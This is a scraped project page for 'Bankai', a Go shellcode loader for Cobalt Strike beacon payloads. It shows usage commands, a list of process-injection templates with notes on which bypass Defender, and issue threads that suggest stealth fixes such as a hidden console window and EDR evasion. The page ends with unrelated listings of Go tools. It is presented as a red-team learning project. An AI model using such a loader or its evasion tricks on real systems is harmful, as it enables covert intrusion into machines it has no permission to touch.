Another Go shellcode loader designed to work with Cobalt Strike raw binary payload.

Related tags

Command Line Bankai
Overview



Bankai

Another Go shellcode loader designed to work with Cobalt Strike raw binary payload. I created this project to mainly educate myself learning Go and directly executing shellcode into the target Windows system using various techniques.

Encryption - I implemented a simple payload encryption process (IV --> AES --> XOR --> Base64) that I learned while studying for SLAE32. This is mainly for protecting Cobalt Strike payload when it's moved over to the target host. The final compiled payload will include a decrypt function within.

Templates - Templates are the skeleton scripts to generate a final payload per each technique.

Installation

git clone https://github.com/bigb0sss/bankai.git
GO111MODULE=off go build bankai.go

Usage & Example

Generate a Cobalt Strike payload:



./bankai -h                       

     _                 _         _ 
    | |               | |       (_)
    | |__   __ _ _ __ | | ____ _ _ 
    | '_ \ / _' | '_ \| |/ / _' | |
    | |_) | (_| | | | |   < (_| | |
    |_.__/ \__,_|_| |_|_|\_\__,_|_|
                        [bigb0ss]

    [INFO] Another Go Shellcode Loader

 
    Required:
    -i            Binary File (e.g., beacon.bin)
    -o            Payload Output (e.g, payload.exe)
    -t            Payload Template (e.g., win32_VirtualProtect.tmpl)
    -a            Arch (32|64)
    
    Optional:
    -h            Print this help menu
    -p            PID

    Templates:                                        Last update: 06/07/21
    +--------------------------------------+-----------+------------------+
    | Techniques                           | PID       | Bypass Defender  |
    +--------------------------------------+-----------+------------------+
    | win32_VirtualProtect.tmpl            |           |        No        |
    +--------------------------------------+-----------+------------------+
    | win64_CreateFiber.tmpl               |           |        No        |
    +--------------------------------------+-----------+------------------+
    | win64_CreateRemoteThreadNative.tmpl  | Required  |        Yes       | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThread.tmpl              |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EtwpCreateEtwThread.tmpl       |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_Syscall.tmpl                   |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThreadpoolWait.tmpl      |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EnumerateLoadedModules.tmpl    |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EnumChildWindows.tmpl          |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateRemoteThread.tmpl        | Required  |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_RtlCreateUserThread.tmpl       | Required  |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThreadNative.tmpl        |           |        No        | 
    +--------------------------------------+-----------+------------------+

    Example:

    ./bankai -i beacon.bin -o payload.exe -t win64_CreateThread.tmpl -a 64
    [INFO] Key: SymE9GQBtyHL4IAq5Pm6r3b8I7PJB9l0
    [INFO] AES encrpyting the payload...
    [INFO] Arch: x64 (64-bit)
    [INFO] Template: win64_CreateThread.tmpl
    [INFO] InputFile: beacon.bin
    [INFO] OutputFile: payload.exe

    ./bankai -i beacon64.bin -o payload.exe -t win64_CreateRemoteThread.tmpl -a 64 -p 7720
    [INFO] Key: 3mOL2Ne5XIW4xCieiR7cPmHtw4o737Do
    [INFO] AES encrpyting the payload...
    [INFO] Arch: x64 (64-bit)
    [INFO] Template: win64_CreateRemoteThread.tmpl
    [INFO] InputFile: beacon64.bin
    [INFO] OutputFile: payload.exe

Credits / Acknowledgments / References

All of the work is inspired and done by the following researchers/projects:

Todo

  • Add more shellcode injection technique templates
  • Add AlternativeShellcodeExec techniques that Ali and Alfaro found
  • Test these shellcodes with modified malleableC2 profiles

Change Log

06/02/21
  • Added win64_CreateThreadpoolWait.tmpl
  • Added win64_EnumerateLoadedModules.tmpl
  • Added win64_EnumChildWindows.tmpl
  • Updated some error handling
06/07/21
  • Added win64_EnumPageFilesW.tmpl
  • Added win64_CreateRemoteThread.tmpl
  • Added win64_RtlCreateUserThread.tmpl
  • Added win64_CreateThreadNative.tmpl
Issues
  • Bug Fix: Line 131 is missing }

    Bug Fix: Line 131 is missing }

    According to the deployment tutorial you provided, an error occurred: image After debugging, it was found that the loop of 128 lines was missing },I added a character on line 131}.

    opened by HexChristmas 0
  • [Feature Enhancement] BananaPhone

    [Feature Enhancement] BananaPhone

    This is worth adding as a template mate:

    https://github.com/C-Sto/BananaPhone

    "It's a go variant of Hells gate! (directly calling windows kernel functions, but from Go!)" It will help with evading EDR.

    opened by Simon-Davies 1
  • [Bug] Console window visible

    [Bug] Console window visible

    You can fix this by adding a compiler flag. See updated code below:

    	cmd := exec.Command(
    		"go",
    		"build",
    		"-ldflags=-s", // Using -s instructs Go to create the smallest output
    		"-ldflags=-w", // Using -w instructs Go to create the smallest output
    		"-ldflags=-H=windowsgui", // hide console window
    		"-o", outputFile,
    		"output/shellcode.go",
    	)
    
    opened by Simon-Davies 1
  • [Bug] -p flag broken if statement

    [Bug] -p flag broken if statement

    You can fix the if statement with the below:

    	if opt.templates == "win64_CreateRemoteThreadNative.tmpl" && opt.pid == 0 || opt.templates == "win64_CreateRemoteThread.tmpl" && opt.pid == 0 || opt.templates == "win64_RtlCreateUserThread.tmpl" && opt.pid == 0 {
    	fmt.Println("[ERROR] For this template, you must use PID (-p).")
    	os.Exit(1)
    
    opened by Simon-Davies 0
Owner
bigb0ss
OSWE | OSCE | OSCP | Offensive Security Consultant Pentesting, RedTeam, ExpDev, Application Security
bigb0ss
A terminal designed for anyone to use and designed for any platform

A terminal designed for anyone to use and designed for any platform. Which includes the basic features of any terminal and includes friendly commands to perform tools such as ping, traceroute, generate key pairs, encrypt/decrypt, router security actions, etc. All of the source code is done in Go.

Karun Kanda 1 Jan 25, 2022
Minutes is a CLI tool for synchronizing work logs between multiple time trackers, invoicing, and bookkeeping software to make entrepreneurs' daily work easier.

Minutes is a CLI tool for synchronizing work logs between multiple time trackers, invoicing, and bookkeeping software to make entrepreneurs' daily work easier.

Gábor Boros 17 Apr 24, 2022
Brigodier is a command parser & dispatcher, designed and developed for command lines such as for Discord bots or Minecraft chat commands. It is a complete port from Mojang's "brigadier" into Go.

brigodier Brigodier is a command parser & dispatcher, designed and developed to provide a simple and flexible command framework. It can be used in man

Minekube 15 Apr 22, 2022
Darktile is a GPU rendered terminal emulator designed for tiling window managers.

Darktile is a GPU rendered terminal emulator designed for tiling window managers.

Liam Galvin 2.7k May 15, 2022
The simple and easy-to-use program designed to watch user activity for Cloud Providers.

Cloud Agent The simple and easy-to-use program is designed to watch user activity and possible orphan clusters for Cloud Providers: Gardener GCP (work

Filip Strózik 3 May 9, 2022
a work time management CLI tool for any platform

english |日本語 jobgosh | job management tool made with golang for shell a multi-platform work time management CLI tool to track and improve your day to

奥田 龍馬 10 Oct 5, 2021
Easily manage your work via command line

Wo Easily manage your work via command line Introduction Wo, is cli that provides it easy to manage your workspace. Wo provides to manipulating workfl

Ali Furkan 5 Dec 11, 2021
Plugin which makes tmux work and feel like i3wm

Tmux Tilish This is a plugin that makes tmux behave more like a typical dynamic window manager. It is heavily inspired by i3wm, and most keybindings a

Jabir Ali Ouassou 235 Apr 30, 2022
This package to make it easy to work with env

Go Env This package to make it easy to work with env Example usage package main

Sergey A. 3 Jan 30, 2022
A CLI tool for working with CloudWatch logs. It performs functions that I need at work.

CloudWatch Logs Utility A simple utility for working with CloudWatch Logs. AWS should probably build this themselves, but since they won't, I am here

J. Alexander Curtis 0 Dec 31, 2021
There is a certain amount of work to be done before you can implement the features of your Go powered CLI app

go-project-template-cli There is a certain amount of work to be done before you can implement the features of your Go powered CLI app. A few of those

null 0 Jan 23, 2022
Golang-video-screensaver - A work in progress Microsoft Windows video screensaver implemented in Go

golang-video-screensaver A work in progress Microsoft Windows video screensaver

null 0 Mar 2, 2022
Another CLI framework for Go. It works on my machine.

Command line interface framework Go framework for rapid command line application development

Ulrich Kautz 112 May 9, 2022
😎 Yet Another yes clone but in Golang

Yeah Output a string repeatedly until killed. Yet Another yes clone but in Golang. Usage Just like yes: yeah This will print "y" until the process is

Eliaz Bobadilla 9 Apr 7, 2022
Yet another Yogurt - An AUR Helper written in Go

Yay Yet Another Yogurt - An AUR Helper Written in Go Help translate yay: Transifex Features Advanced dependency solving PKGBUILD downloading from ABS

J Guerreiro 7.8k May 13, 2022
Yet another emojify command written in Go 🍜

go-emojify Yet another emojify command written in Go ?? Installation $ go get github.com/yusukebe/go-emojify/cmd/go-emojify Usage $ go-emojify "I lov

Yusuke Wada 1 Nov 7, 2021
Portal is a quick and easy command-line file transfer utility from any computer to another 🖥️ 🌌 💻

Portal is a quick and easy command-line file transfer utility from any computer to another ??️ ?? ??

Zino Kader 98 May 7, 2022
CLI filters the contents of the csv file according to the filters from the another file.

filtercsv CLI filters the contents of the csv file according to the filters from the another file. Made to process big files by a lots of filters. By

null 0 Dec 2, 2021
A command line tool to prompt for a value to be included in another command line.

readval is a command line tool which is designed for one specific purpose—to prompt for a value to be included in another command line. readval prints

Venky 0 Dec 22, 2021